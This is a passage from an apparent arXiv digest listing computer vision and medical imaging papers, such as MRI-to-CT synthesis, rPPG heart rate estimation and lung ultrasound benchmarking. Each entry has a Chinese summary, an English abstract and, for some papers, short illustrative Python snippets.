Abstract:We investigate three distinct methods of incorporating all-sky imager (ASI) images into deep learning (DL) irradiance nowcasting. The first method relies on a convolutional neural network (CNN) to extract features directly from raw RGB images. The second method uses state-of-the-art algorithms to engineer 2D feature maps informed by domain knowledge, e.g., cloud segmentation, the cloud motion vector, solar position, and cloud base height. These feature maps are then passed to a CNN to extract compound features. The final method relies on aggregating the engineered 2D feature maps into time-series input. Each of the three methods were then used as part of a DL model trained on a high-frequency, 29-day dataset to generate multi-horizon forecasts of global horizontal irradiance up to 15 minutes ahead. The models were then evaluated using root mean squared error and skill score on 7 selected days of data. Aggregated engineered ASI features as model input yielded superior forecasting performance, demonstrating that integration of ASI images into DL nowcasting models is possible without complex spatially-ordered DL-architectures and inputs, underscoring opportunities for alternative image processing methods as well as the potential for improved spatial DL feature processing methods.
[CV-302] SpatialPoint: Spatial-aware Point Prediction for Embodied Localization
【速读】:该论文旨在解决具身智能(embodied intelligence)中关键的3D空间行为决策问题,即如何根据视觉观测和语言指令准确预测可执行的3D点位,以支持物理交互与导航任务。其核心挑战在于现有视觉-语言模型(VLM)主要依赖RGB图像输入,难以实现跨场景的鲁棒几何推理,限制了在真实机器人应用中的泛化能力。解决方案的关键在于提出SpatialPoint框架,通过显式整合结构化深度信息(structured depth)到VLM中,生成相机坐标系下的3D坐标,并构建包含260万样本的RGB-D数据集用于训练与评估。实验表明,该方法显著提升了具身定位(embodied localization)性能,并在真实机器人平台上验证了其在抓取、放置和导航三类任务中的有效性。
链接: https://arxiv.org/abs/2603.26690
作者: Qiming Zhu,Zhirui Fang,Tianming Zhang,Chuanxiu Liu,Xiaoke Jiang,Lei Zhang
机构: Visincept Research; Tsinghua University; International Digital Economy Academy (IDEA)
类目: Robotics (cs.RO); Artificial Intelligence (cs.AI); Computer Vision and Pattern Recognition (cs.CV)
备注: 19 pages, 12 figures, supplementary material included
Abstract:Embodied intelligence fundamentally requires a capability to determine where to act in 3D space. We formalize this requirement as embodied localization – the problem of predicting executable 3D points conditioned on visual observations and language instructions. We instantiate embodied localization with two complementary target types: touchable points, surface-grounded 3D points enabling direct physical interaction, and air points, free-space 3D points specifying placement and navigation goals, directional constraints, or geometric relations. Embodied localization is inherently a problem of embodied 3D spatial reasoning – yet most existing vision-language systems rely predominantly on RGB inputs, necessitating implicit geometric reconstruction that limits cross-scene generalization, despite the widespread adoption of RGB-D sensors in robotics. To address this gap, we propose SpatialPoint, a spatial-aware vision-language framework with careful design that integrates structured depth into a vision-language model (VLM) and generates camera-frame 3D coordinates. We construct a 2.6M-sample RGB-D dataset covering both touchable and air points QA pairs for training and evaluation. Extensive experiments demonstrate that incorporating depth into VLMs significantly improves embodied localization performance. We further validate SpatialPoint through real-robot deployment across three representative tasks: language-guided robotic arm grasping at specified locations, object placement to target destinations, and mobile robot navigation to goal positions.
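SpatialPoint 输出相机坐标系下的 3D 点;给定像素坐标、深度与相机内参,针孔模型的反投影公式为 x=(u−cx)·d/fx、y=(v−cy)·d/fy、z=d。下面是最小示意(内参数值为假设):

```python
def backproject(u, v, depth, fx, fy, cx, cy):
    """像素 (u, v) + 深度 d -> 相机坐标系 3D 点(针孔模型,示意)"""
    x = (u - cx) * depth / fx
    y = (v - cy) * depth / fy
    return (x, y, depth)

# 主点处、深度 2m 的像素正好落在光轴上
p = backproject(320.0, 240.0, 2.0, 600.0, 600.0, 320.0, 240.0)
# p == (0.0, 0.0, 2.0)

# 偏离主点 600 像素、深度 2m -> 横向偏移 2m
p2 = backproject(920.0, 240.0, 2.0, 600.0, 600.0, 320.0, 240.0)
# p2 == (2.0, 0.0, 2.0)
```

这说明了为何显式引入结构化深度能让 VLM 免去隐式几何重建:深度一旦给定,2D 预测点即可确定地映射为可执行的 3D 坐标。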
[CV-303] Contextual Graph Representations for Task-Driven 3D Perception and Planning
【速读】:该论文旨在解决3D场景图(3D scene graphs)在机器人任务规划中因状态空间过大而导致的计算效率低下问题,尤其是在资源受限环境下难以部署的挑战。其核心解决方案在于:首先,评估现有具身人工智能(embodied AI)环境在机器人任务规划与3D场景图交叉研究中的适用性,并构建基准以对比先进经典规划器的性能;其次,探索利用图神经网络(graph neural networks)挖掘规划领域中关系结构的不变性,从而学习更高效的表示,提升规划速度。
链接: https://arxiv.org/abs/2603.26685
作者: Christopher Agia
机构: 未知
类目: Robotics (cs.RO); Artificial Intelligence (cs.AI); Computer Vision and Pattern Recognition (cs.CV); Machine Learning (cs.LG)
备注: University of Toronto Undergraduate Thesis, 2021. 85 pages, 24 figures
Abstract:Recent advances in computer vision facilitate fully automatic extraction of object-centric relational representations from visual-inertial data. These state representations, dubbed 3D scene graphs, are a hierarchical decomposition of real-world scenes with a dense multiplex graph structure. While 3D scene graphs claim to promote efficient task planning for robot systems, they contain numerous objects and relations when only small subsets are required for a given task. This magnifies the state space that task planners must operate over and prohibits deployment in resource constrained settings. This thesis tests the suitability of existing embodied AI environments for research at the intersection of robot task planning and 3D scene graphs and constructs a benchmark for empirical comparison of state-of-the-art classical planners. Furthermore, we explore the use of graph neural networks to harness invariances in the relational structure of planning domains and learn representations that afford faster planning.
[CV-304] MRI-to-CT synthesis using drifting models
【速读】:该论文旨在解决从磁共振成像(MRI)中高保真合成计算机断层扫描(CT)图像的问题,以支持无需额外电离辐射的MR-only盆腔 workflows,例如放射治疗计划和PET/MR衰减校正。其核心解决方案是采用一种新颖的“漂移模型”(drifting model),该模型通过单步推理实现快速且高质量的CT图像生成,在保持结构一致性(如皮质骨边界、骶骨与股骨头几何形态)的同时显著优于传统卷积神经网络(UNet、VAE)、生成对抗网络(WGAN-GP)、物理启发的概率模型(PPFM)以及多步扩散模型(FastDDPM、DDIM、DDPM)等基线方法。关键优势在于:在毫秒级推理时间内达成接近或超越迭代扩散采样的图像质量,从而在准确性和效率之间实现了更优权衡。
链接: https://arxiv.org/abs/2603.28498
作者: Qing Lyu,Jianxu Wang,Jeremy Hudson,Ge Wang,Christopher T. Whitlow
机构: Yale School of Medicine (耶鲁医学院); Rensselaer Polytechnic Institute (伦斯勒理工学院)
类目: Image and Video Processing (eess.IV); Artificial Intelligence (cs.AI); Computer Vision and Pattern Recognition (cs.CV)
备注:
Abstract:Accurate MRI-to-CT synthesis could enable MR-only pelvic workflows by providing CT-like images with bone details while avoiding additional ionizing radiation. In this work, we investigate recently proposed drifting models for synthesizing pelvis CT images from MRI and benchmark them against convolutional neural networks (UNet, VAE), a generative adversarial network (WGAN-GP), a physics-inspired probabilistic model (PPFM), and diffusion-based methods (FastDDPM, DDIM, DDPM). Experiments are performed on two complementary datasets: Gold Atlas Male Pelvis and the SynthRAD2023 pelvis subset. Image fidelity and structural consistency are evaluated with SSIM, PSNR, and RMSE, complemented by qualitative assessment of anatomically critical regions such as cortical bone and pelvic soft-tissue interfaces. Across both datasets, the proposed drifting model achieves high SSIM and PSNR and low RMSE, surpassing strong diffusion baselines and conventional CNN-, VAE-, GAN-, and PPFM-based methods. Visual inspection shows sharper cortical bone edges, improved depiction of sacral and femoral head geometry, and reduced artifacts or over-smoothing, particularly at bone-air-soft tissue boundaries. Moreover, the drifting model attains these gains with one-step inference and inference times on the order of milliseconds, yielding a more favorable accuracy-efficiency trade-off than iterative diffusion sampling while remaining competitive in image quality. These findings suggest that drifting models are a promising direction for fast, high-quality pelvic synthetic CT generation from MRI and warrant further investigation for downstream applications such as MRI-only radiotherapy planning and PET/MR attenuation correction.
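摘要中以 SSIM、PSNR、RMSE 三项指标评估图像保真度与结构一致性。下面给出其中 PSNR 与 RMSE 的最小 NumPy 示意实现(与论文官方代码无关,仅用于说明指标定义;`data_range` 的取值为假设):

```python
import numpy as np

def rmse(a, b):
    """均方根误差(RMSE):逐体素比较合成CT与参考CT。"""
    return float(np.sqrt(np.mean((a - b) ** 2)))

def psnr(a, b, data_range=1.0):
    """峰值信噪比(PSNR):data_range 为像素动态范围(此处假设归一化到 [0,1])。"""
    mse = np.mean((a - b) ** 2)
    return float(10 * np.log10(data_range ** 2 / mse))

a = np.zeros((4, 4))
b = np.full((4, 4), 0.1)
print(rmse(a, b))  # → 约 0.1
print(psnr(a, b))  # → 约 20.0 dB
```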
[CV-305] Segmenting Superbubbles in a Simulated Multiphase Interstellar Medium using Computer Vision
【速读】:该论文旨在解决如何在磁流体动力学(MHD)模拟的超新星驱动星际介质中,实现对超气泡(superbubble)的精确三维分割与追踪问题。其解决方案的关键在于开发了一种基于计算机视觉的方法,利用先进的3D Transformer模型有效捕捉这些天体物理结构的复杂形态及其动态演化过程,从而生成高精度的三维分割掩膜,实现对超气泡结构演变、能量保留及与周围星际物质相互作用的定量分析。
链接: https://arxiv.org/abs/2603.27741
作者: Jing-Wen Chen,Alex S. Hill,Anna Ordog,Rebecca A. Booth,Mohamed S. Shehata
机构: University of British Columbia, Okanagan Campus (不列颠哥伦比亚大学奥肯那根校区); Dominion Radio Astrophysical Observatory, Herzberg Research Centre for Astronomy and Astrophysics, National Research Council Canada (国家研究委员会赫尔兹伯格天文与天体物理研究中心); University of Western Ontario (西安大略大学); University of Calgary (卡尔加里大学)
类目: Astrophysics of Galaxies (astro-ph.GA); Computer Vision and Pattern Recognition (cs.CV)
备注:
Abstract:We developed a computer vision-based methodology to achieve precise 3D segmentation and tracking of superbubbles within magnetohydrodynamic simulations of the supernova-driven interstellar medium. Leveraging advanced 3D transformer models, our approach effectively captures the complex morphology and dynamic evolution of these astrophysical structures. To demonstrate the technique, we specifically focused on a superbubble exhibiting interesting interactions with its surrounding medium, driven by a series of successive supernova explosions. Our model successfully generated detailed 3D segmentation masks, enabling us to visualize and analyze the bubble’s structural evolution over time. The results reveal insights into the superbubble’s growth patterns, energy retention, and interactions with surrounding interstellar matter. This interdisciplinary approach not only enhances our understanding of superbubble dynamics but also offers a robust framework for investigating other complex phenomena in the cosmos.
[CV-306] Grounding Social Perception in Intuitive Physics
【速读】:该论文旨在解决人类如何在物理世界约束下,通过观察他人行为推断其社会意图(如目标、关系等)的问题,即“物理 grounded 社会感知”机制。传统方法多依赖视觉模式匹配,难以捕捉动作背后的因果逻辑与心理状态变化。解决方案的关键在于提出一个融合直觉心理学(intuitive psychology)与直觉物理学(intuitive physics)的计算模型——SIMPLE,该模型基于贝叶斯逆向规划框架,整合了物理模拟、规划推理与概率推理能力,能够从代理轨迹中准确推断其目标和关系。实验表明,SIMPLE在PHASE数据集上表现接近人类判断,而纯视觉或忽略物理约束的基线模型则显著落后,验证了物理基础推理对社会理解的核心作用。
链接: https://arxiv.org/abs/2603.27410
作者: Lance Ying,Aydan Y. Huang,Aviv Netanyahu,Andrei Barbu,Boris Katz,Joshua B. Tenenbaum,Tianmin Shu
机构: Massachusetts Institute of Technology (麻省理工学院); Harvard University (哈佛大学); Johns Hopkins University (约翰霍普金斯大学); Amazon (亚马逊)
类目: Neurons and Cognition (q-bio.NC); Artificial Intelligence (cs.AI); Computer Vision and Pattern Recognition (cs.CV)
备注: 26 pages, 11 figures
Abstract:People infer rich social information from others’ actions. These inferences are often constrained by the physical world: what agents can do, what obstacles permit, and how the physical actions of agents causally change an environment and other agents’ mental states and behavior. We propose that such rich social perception is more than visual pattern matching, but rather a reasoning process grounded in an integration of intuitive psychology with intuitive physics. To test this hypothesis, we introduced PHASE (PHysically grounded Abstract Social Events), a large dataset of procedurally generated animations, depicting physically simulated two-agent interactions on a 2D surface. Each animation follows the style of the Heider and Simmel movie, with systematic variation in environment geometry, object dynamics, agent capacities, goals, and relationships (friendly/adversarial/neutral). We then present a computational model, SIMPLE, a physics-grounded Bayesian inverse planning model that integrates planning, probabilistic planning, and physics simulation to infer agents’ goals and relations from their trajectories. Our experimental results showed that SIMPLE achieved high accuracy and agreement with human judgments across diverse scenarios, while feedforward baseline models – including strong vision-language models – and physics-agnostic inverse planning failed to achieve human-level performance and did not align with human judgments. These results suggest that our model provides a computational account for how people understand physically grounded social scenes by inverting a generative model of physics and agents.
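SIMPLE 的核心是贝叶斯逆向规划:P(目标 | 轨迹) ∝ P(轨迹 | 目标)·P(目标)。下面用离散网格上的 Boltzmann"噪声理性"似然给出一个高度简化的示意(均匀先验;函数名、beta 取值及网格设定均为演示假设,并非论文实现):

```python
import numpy as np

def goal_posterior(traj, goals, beta=2.0):
    """对候选目标做贝叶斯逆向规划的玩具版。

    每步的(未归一化)对数似然取 beta × (该步向目标推进的曼哈顿距离),
    即"朝目标前进的动作被指数级偏好";先验取均匀分布。
    """
    log_post = np.zeros(len(goals))
    for g, goal in enumerate(goals):
        for (x0, y0), (x1, y1) in zip(traj[:-1], traj[1:]):
            before = abs(goal[0] - x0) + abs(goal[1] - y0)
            after = abs(goal[0] - x1) + abs(goal[1] - y1)
            log_post[g] += beta * (before - after)  # 向该目标的推进量
    post = np.exp(log_post - log_post.max())
    return post / post.sum()

traj = [(0, 0), (1, 0), (2, 0), (3, 0)]  # 智能体一路向东
goals = [(5, 0), (0, 5)]                 # 候选目标:东侧 vs 北侧
post = goal_posterior(traj, goals)       # 后验几乎全部落在东侧目标上
```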
[CV-307] Guided Lensless Polarization Imaging
【速读】:该论文旨在解决传统偏振成像系统成本高、体积大以及现有无透镜偏振成像系统重建质量有限的问题。其关键解决方案是提出一种RGB引导的无透镜偏振成像系统,通过融合一个紧凑的偏振-RGB传感器与一个辅助的常规RGB相机提供的结构引导信息,采用两阶段重建流程:第一阶段基于物理模型反演获得初始偏振图像,第二阶段利用Transformer架构的融合网络结合RGB引导图像对结果进行精细化重构,从而显著提升重建质量和保真度,并在不同数据集和成像条件下具有良好泛化能力,且无需微调即可实现实验原型机的高质量真实成像。
链接: https://arxiv.org/abs/2603.27357
作者: Noa Kraicer,Erez Yosef,Raja Giryes
机构: Tel Aviv University (特拉维夫大学)
类目: Image and Video Processing (eess.IV); Artificial Intelligence (cs.AI); Computer Vision and Pattern Recognition (cs.CV)
备注:
Abstract:Polarization imaging captures the polarization state of light, revealing information invisible to the human eye yet valuable in domains such as biomedical diagnostics, autonomous driving, and remote sensing. However, conventional polarization cameras are often expensive, bulky, or both, limiting their practical use. Lensless imaging offers a compact, low-cost alternative by replacing the lens with a simple optical element like a diffuser and performing computational reconstruction, but existing lensless polarization systems suffer from limited reconstruction quality. To overcome these limitations, we introduce a RGB-guided lensless polarization imaging system that combines a compact polarization-RGB sensor with an auxiliary, widely available conventional RGB camera providing structural guidance. We reconstruct multi-angle polarization images for each RGB color channel through a two-stage pipeline: a physics-based inversion recovers an initial polarization image, followed by a Transformer-based fusion network that refines this reconstruction using the RGB guidance image from the conventional RGB camera. Our two-stage method significantly improves reconstruction quality and fidelity over lensless-only baselines, generalizes across datasets and imaging conditions, and achieves high-quality real-world results on our physical prototype lensless camera without any fine-tuning.
[CV-308] Quantitative measurements of biological/chemical concentrations using smartphone cameras
【速读】:该论文旨在解决传统生物/化学检测设备体积大、成本高且不便于在偏远或资源匮乏地区使用的问题。其核心解决方案是构建一个基于智能手机的成像系统,通过设计特定的光学装置结合图像处理与数据分析技术,建立颜色信息与样品浓度之间的定量关系数据库。该方法能够实现对荧光物质和胶体混合物浓度的精确估计,性能可媲美商用及实验室仪器,为开发小型化、低成本、便携式的分析与诊断系统提供了可行路径。
链接: https://arxiv.org/abs/2603.27118
作者: Zhendong Cao,Hongji Dai,Zhida Li,Ash Parameswaran
机构: 未知
类目: Image and Video Processing (eess.IV); Computer Vision and Pattern Recognition (cs.CV)
备注:
Abstract:This paper presents a smartphone-based imaging system capable of quantifying the concentration of an assortment of biological/chemical assay samples. The main objective is to construct an image database which characterizes the relationship between color information and concentrations of the biological/chemical assay sample. For this aim, a designated optical setup combined with image processing and data analyzing techniques was implemented. A series of experiments conducted on selected assays, including fluorescein, RNA Mango, homogenized milk and yeast have demonstrated that the proposed system estimates the concentration of fluorescent materials and colloidal mixtures comparable to currently used commercial and laboratory instruments. Furthermore, by utilizing the camera and computational power of smartphones, eventual development can be directed toward extremely compact, inexpensive and portable analysis and diagnostic systems which will allow experiments and tests to be conducted in remote or impoverished areas.
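该摘要的核心是建立"颜色信息—浓度"的标定关系。下面用单通道线性回归给出最小示意(真实系统可能在对数域或使用多通道特征;以下标定数据与浓度单位均为假想示例):

```python
import numpy as np

def calibrate(intensities, concentrations):
    """对参考样本拟合"通道强度 → 浓度"的直线标定。"""
    slope, intercept = np.polyfit(intensities, concentrations, deg=1)
    return slope, intercept

def estimate(intensity, slope, intercept):
    """用标定直线估计未知样品的浓度。"""
    return slope * intensity + intercept

# 假想的标定序列:各参考浓度样品的绿色通道平均强度
intensities = np.array([30.0, 60.0, 90.0, 120.0, 150.0])
concentrations = np.array([1.0, 2.0, 3.0, 4.0, 5.0])  # 例如 uM 荧光素

slope, intercept = calibrate(intensities, concentrations)
print(estimate(105.0, slope, intercept))  # → 约 3.5(参考点之间的线性内插)
```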
[CV-309] Uncertainty-Aware Mapping from 3D Keypoints to Anatomical Landmarks for Markerless Biomechanics
【速读】:该论文旨在解决无标记(markerless)生物力学分析中,基于视频提取的3D骨骼关键点(3D skeletal keypoints)在映射到3D解剖学地标(3D anatomical landmarks)时缺乏帧级质量控制的问题。传统方法将关键点估计视为确定性输出,无法量化其不确定性,从而影响后续逆运动学和肌肉骨骼分析的可靠性。解决方案的关键在于引入一种基于时间学习框架的不确定性感知建模方法,区分观测噪声引起的不确定性与模型局限性带来的不确定性,并利用AMASS数据集上的同步动作捕捉真值评估其有效性。实验表明,模型不确定性估计与地标误差呈现显著单调相关性(Spearman ρ ≈ 0.63),可实现高精度的帧级可靠性排序(如10%覆盖率下误差降低至≈16.8 mm)及严重异常检测(ROC-AUC ≈ 0.92,阈值为50 mm),且对输入退化具有鲁棒性,验证了预测不确定性作为自动质量控制工具的实际可行性。
链接: https://arxiv.org/abs/2603.26844
作者: Cesare Davide Pace,Alessandro Marco De Nunzio,Claudio De Stefano,Francesco Fontanella,Mario Molinara
机构: Università degli Studi di Cassino e del Lazio Meridionale (卡西诺和拉齐奥南部大学)
类目: Image and Video Processing (eess.IV); Artificial Intelligence (cs.AI); Computer Vision and Pattern Recognition (cs.CV)
备注: 7 pages, 1 figure, submitted to Pattern Recognition Letters, uncertainty-aware framework for 3D keypoint-to-landmark mapping in markerless biomechanics
Abstract:Markerless biomechanics increasingly relies on 3D skeletal keypoints extracted from video, yet downstream biomechanical mappings typically treat these estimates as deterministic, providing no principled mechanism for frame-wise quality control. In this work, we investigate predictive uncertainty as a quantitative measure of confidence for mapping 3D pose keypoints to 3D anatomical landmarks, a critical step preceding inverse kinematics and musculoskeletal analysis. Within a temporal learning framework, we model both uncertainty arising from observation noise and uncertainty related to model limitations. Using synchronized motion capture ground truth on AMASS, we evaluate uncertainty at frame and joint level through error–uncertainty rank correlation, risk–coverage analysis, and catastrophic outlier detection. Across experiments, uncertainty estimates, particularly those associated with model uncertainty, exhibit a strong monotonic association with landmark error (Spearman \rho \approx 0.63), enabling selective retention of reliable frames (error reduced to \approx 16.8 mm at 10% coverage) and accurate detection of severe failures (ROC-AUC \approx 0.92 for errors > 50 mm). Reliability ranking remains stable under controlled input degradation, including Gaussian noise and simulated missing joints. In contrast, uncertainty attributable to observation noise provides limited additional benefit in this setting, suggesting that dominant failures in keypoint-to-landmark mapping are driven primarily by model uncertainty. Our results establish predictive uncertainty as a practical, frame-wise tool for automatic quality control in markerless biomechanical pipelines.
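摘要中的评估流程(误差—不确定性秩相关、风险—覆盖率分析)可以用如下最小示意复现其思路:按预测不确定性排序,仅保留最可信的一部分帧,再统计保留帧的误差。合成数据及各参数均为演示假设:

```python
import numpy as np

def spearman_rho(x, y):
    """Spearman 秩相关:对秩次计算 Pearson 相关(假设无并列值)。"""
    rx = np.argsort(np.argsort(x)).astype(float)
    ry = np.argsort(np.argsort(y)).astype(float)
    rx -= rx.mean(); ry -= ry.mean()
    return float((rx @ ry) / np.sqrt((rx @ rx) * (ry @ ry)))

def selective_error(errors, uncertainties, coverage):
    """风险—覆盖率分析:保留不确定性最低的 coverage 比例帧后的平均误差。"""
    k = max(1, int(round(coverage * len(errors))))
    keep = np.argsort(uncertainties)[:k]
    return float(np.mean(errors[keep]))

rng = np.random.default_rng(0)
uncertainty = rng.uniform(0.0, 1.0, 1000)
error = 20.0 * uncertainty + rng.normal(0.0, 2.0, 1000)  # 误差大体随不确定性增长

print(spearman_rho(uncertainty, error))           # 强正相关
print(selective_error(error, uncertainty, 0.10))  # 远低于全体平均误差
```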
[CV-310] Reliability-Aware Weighted Multi-Scale Spatio-Temporal Maps for Heart Rate Monitoring ICIP2026
【速读】:该论文旨在解决远程光电容积脉搏波描记术(remote photoplethysmography, rPPG)在非受控环境下因光照变化、运动、阴影和镜面反射等因素导致信号质量下降的问题。其解决方案的关键在于提出一种可靠性感知加权多尺度时空(Reliability-Aware Weighted Multi-Scale Spatio-Temporal, WMST)映射机制,通过抑制环境噪声来建模像素可靠性,并采用不同的加权策略聚焦于更具生理有效性的区域;同时结合基于Swin-Unet的自监督对比学习框架,利用传统rPPG信号与时间扩展的WMST映射生成正样本对,并引入高-高-高(High-High-High, HHH)小波映射作为负样本以保留运动和结构信息但滤除生理成分,从而显著提升心率(heart rate, HR)估计的鲁棒性和准确性。
链接: https://arxiv.org/abs/2603.26836
作者: Arpan Bairagi,Rakesh Dey,Siladittya Manna,Umapada Pal
机构: 未知
类目: Image and Video Processing (eess.IV); Computer Vision and Pattern Recognition (cs.CV)
备注: 6 pages, 4 figures. Under review at ICIP 2026
Abstract:Remote photoplethysmography (rPPG) allows for the contactless estimation of physiological signals from facial videos by analyzing subtle skin color changes. However, rPPG signals are extremely susceptible to illumination changes, motion, shadows, and specular reflections, resulting in low-quality signals in unconstrained environments. To overcome these issues, we present a Reliability-Aware Weighted Multi-Scale Spatio-Temporal (WMST) map that models pixel reliability through the suppression of environmental noises. These noises are modeled using different weighting strategies to focus on more physiologically valid areas. Leveraging the WMST map, we develop a Self-Supervised Learning (SSL) contrastive approach based on Swin-Unet, where positive pairs are generated from conventional rPPG signals and temporally expanded WMST maps. Moreover, we introduce a new High-High-High (HHH) wavelet map as a negative example that maintains motion and structural details while filtering out physiological information. Here, our aim is to estimate heart rate (HR), and the experiments on public rPPG benchmarks show that our approach enhances motion and illumination robustness with lower HR estimation error and higher Pearson correlation than existing SSL-based rPPG methods.
[CV-311] ANVIL: Accelerator-Native Video Interpolation via Codec Motion Vector Priors
【速读】:该论文旨在解决生成式 AI (Generative AI) 在移动端实现视频帧率翻倍(frame-rate doubling)时面临的三大部署障碍:一是空间采样操作超出帧预算或缺乏硬件支持;二是迭代光流精修在8位后训练量化(post-training quantization)下失效;三是内存密集型操作主导推理图。解决方案的关键在于利用H.264解码器已计算出的运动向量(motion vectors)对输入帧进行预对齐,从而移除模型中学习的光流、空间采样和迭代累积模块,使剩余结构仅由以卷积为主的计算密集型操作构成,显著提升移动端神经处理单元(NPU)上的推理效率与量化鲁棒性。
链接: https://arxiv.org/abs/2603.26835
作者: Shibo Liu
机构: North China University of Science and Technology (华北理工大学)
类目: Image and Video Processing (eess.IV); Computer Vision and Pattern Recognition (cs.CV)
备注: 12 pages, 4 figures, 9 tables
Abstract:Mobile displays refresh at 90-120 Hz, yet most video is encoded at 24-30 frames per second; real-time frame-rate doubling requires each synthesized frame within 33.3 ms on mobile neural processing units. We show that mainstream flow-based video frame interpolation faces three structural deployment barriers on mobile accelerators: spatial sampling operators exceed the frame budget or lack hardware support, iterative flow refinement collapses under 8-bit post-training quantization, and memory-bound operators dominate the inference graph. ANVIL addresses these barriers by reusing motion vectors already computed by the H.264 decoder to prealign input frames, removing learned optical flow, spatial sampling, and iterative accumulation from the accelerator graph. The remaining residual is refined by a convolution-dominated network whose inference graph is composed almost entirely of compute-bound operators. On a Snapdragon 8 Gen 3 device, ANVIL achieves 12.8 ms 1080p network inference in 8-bit integer precision; an open-source Android player sustains 28.4 ms median end-to-end latency per interpolated frame pair over 54,623 consecutively logged samples during 30-minute continuous playback. Per-operator causal analysis identifies quantized accumulation on recurrent flow states as a key mechanism behind integer quantization failure in iterative methods. The current design targets H.264 playback scenarios with decoder-exposed motion vectors.
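ANVIL 的关键步骤是"复用解码器已算好的运动向量对输入帧预对齐,让网络只回归残差"。真实 H.264 以 16×16 宏块、1/4 像素精度给出运动场,下面用整数像素、4×4 块的 NumPy 玩具版示意这一思路(块大小与运动向量符号约定均为假设):

```python
import numpy as np

def prealign(frame, mvs, block=4):
    """按每块的运动向量 (dy, dx) 从 frame 中取样,得到预对齐帧。

    mvs 形状为 (H//block, W//block, 2),模拟 H.264 解码器暴露的
    逐宏块运动场;越界采样简单地钳位到图像边界。
    """
    h, w = frame.shape
    out = np.zeros_like(frame)
    for by in range(h // block):
        for bx in range(w // block):
            dy, dx = mvs[by, bx]
            y0 = np.clip(by * block + dy, 0, h - block)
            x0 = np.clip(bx * block + dx, 0, w - block)
            out[by*block:(by+1)*block, bx*block:(bx+1)*block] = \
                frame[y0:y0+block, x0:x0+block]
    return out

# 内容在两帧之间向右平移 2 像素的合成帧:
prev = np.zeros((16, 16)); prev[:, 6:8] = 1.0
mvs = np.zeros((4, 4, 2), dtype=int)
mvs[..., 1] = -2  # 内容右移 2 px ⇒ 向左取样 2 px
aligned = prealign(prev, mvs)  # 竖条从第 6-7 列对齐到第 8-9 列
```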
[CV-312] Hybrid Diffusion Model for Breast Ultrasound Image Augmentation
【速读】:该论文旨在解决乳腺超声(Breast Ultrasound, BUS)数据集在数据增强过程中存在的图像质量低、纹理失真等问题,这些问题限制了下游诊断模型的鲁棒性。其解决方案的关键在于提出了一种混合扩散增强框架,通过结合文本到图像生成(text-to-image generation)与图像到图像(image-to-image, img2img)精炼机制,并引入低秩适应(Low-Rank Adaptation, LoRA)和文本反转(Textual Inversion, TI)进行微调,从而显著提升合成图像的视觉保真度和纹理一致性。实验表明,相较于Stable Diffusion v1.5基线,该方法将Frechet Inception Distance (FID) 从45.97降至33.29,同时保持了与原始模型相当的分类性能,有效克服了传统扩散增强方法在超声图像中常见的低质量缺陷。
链接: https://arxiv.org/abs/2603.26834
作者: Farhan Fuad Abir,Sanjeda Sara Jennifer,Niloofar Yousefi,Laura J. Brattain
机构: 未知
类目: Image and Video Processing (eess.IV); Artificial Intelligence (cs.AI); Computer Vision and Pattern Recognition (cs.CV)
备注: Accepted at IEEE International Symposium on Biomedical Imaging (ISBI) 2026
Abstract:We propose a hybrid diffusion-based augmentation framework to overcome the critical challenge of ultrasound data augmentation in breast ultrasound (BUS) datasets. Unlike conventional diffusion-based augmentations, our approach improves visual fidelity and preserves ultrasound texture by combining text-to-image generation with image-to-image (img2img) refinement, as well as fine-tuning with low-rank adaptation (LoRA) and textual inversion (TI). Our method generated realistic, class-consistent images on an open-source Kaggle breast ultrasound image dataset (BUSI). Compared to the Stable Diffusion v1.5 baseline, incorporating TI and img2img refinement reduced the Frechet Inception Distance (FID) from 45.97 to 33.29, demonstrating a substantial gain in fidelity while maintaining comparable downstream classification performance. Overall, the proposed framework effectively mitigates the low-fidelity limitations of synthetic ultrasound images and enhances the quality of augmentation for robust diagnostic modeling.
[CV-313] External Benchmarking of Lung Ultrasound Models for Pneumothorax-Related Signs: A Manifest-Based Multi-Source Study
【速读】:该论文旨在解决肺气胸相关肺部超声(LUS)人工智能(AI)模型外部验证缺乏可重复基准的问题,以及二分类的肺滑动判断可能掩盖临床重要征象的局限性。其解决方案的关键在于构建了一个基于“重构说明文件”(manifest-based)的多源外部基准,该基准包含视频URL、时间戳、裁剪坐标、标签及探头形状等信息,从而实现无需重新分发原始视频即可进行可复现的外部评估;同时引入四种标签(正常肺滑动、无肺滑动、肺点、肺脉)替代单一的二分类任务,揭示了传统二分类模型对“肺脉”和“肺点”等模糊状态的误判问题,证明了多类别细粒度标注对于提升AI在 pneumothorax 诊断中推理能力的重要性。
链接: https://arxiv.org/abs/2603.26832
作者: Takehiro Ishikawa
机构: 未知
类目: Image and Video Processing (eess.IV); Computer Vision and Pattern Recognition (cs.CV)
备注:
Abstract:Background and Aims: Reproducible external benchmarks for pneumothorax-related lung ultrasound (LUS) AI are scarce, and binary lung-sliding classification may obscure clinically important signs. We therefore developed a manifest-based external benchmark and used it to test both cross-domain generalization and task validity. Methods: We curated 280 clips from 190 publicly accessible LUS source videos and released a reconstruction manifest containing URLs, timestamps, crop coordinates, labels, and probe shape. Labels were normal lung sliding, absent lung sliding, lung point, and lung pulse. A previously published single-site binary classifier was evaluated on this benchmark; challenge-state analysis examined lung point and lung pulse using the predicted probability of absent sliding, P(absent). Results: The single-site comparator achieved ROC-AUC 0.9625 in-domain but 0.7050 on the heterogeneous external benchmark; restricting external evaluation to linear clips still yielded ROC-AUC 0.7212. In challenge-state analysis, mean P(absent) ranked absent (0.504) > lung point (0.313) > normal (0.186) > lung pulse (0.143). Lung pulse differed from absent clips (p=0.000470) but not from normal clips (p=0.813), indicating that the binary model treated pulse as normal-like despite absent sliding. Lung point differed from both absent (p=0.000468) and normal (p=0.000026), supporting its interpretation as an intermediate ambiguity state rather than a clean binary class. Conclusion: A manifest-based, multi-source benchmark can support reproducible external evaluation without redistributing source videos. Binary lung-sliding classification is an incomplete proxy for pneumothorax reasoning because it obscures blind-spot and ambiguity states such as lung pulse and lung point.
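论文的"重构说明文件"(manifest)包含 URL、时间戳、裁剪坐标、标签与探头形状,使外部评估可在不重新分发源视频的情况下复现。下面给出一条示意性 manifest 记录及其重构函数(字段名与所有取值均为假设,并非已发布 manifest 的真实格式):

```python
import numpy as np

# 一条示意性的 manifest 记录(字段仿照论文描述,取值纯属举例)
row = {
    "url": "https://example.org/lus_source_video.mp4",  # 假想的源视频 URL
    "start_s": 12.0, "end_s": 16.0,                     # 片段起止时间戳(秒)
    "crop": (40, 60, 360, 300),                         # x, y, 宽, 高
    "label": "lung_point",                              # 四类征象标签之一
    "probe": "linear",                                  # 探头形状
}

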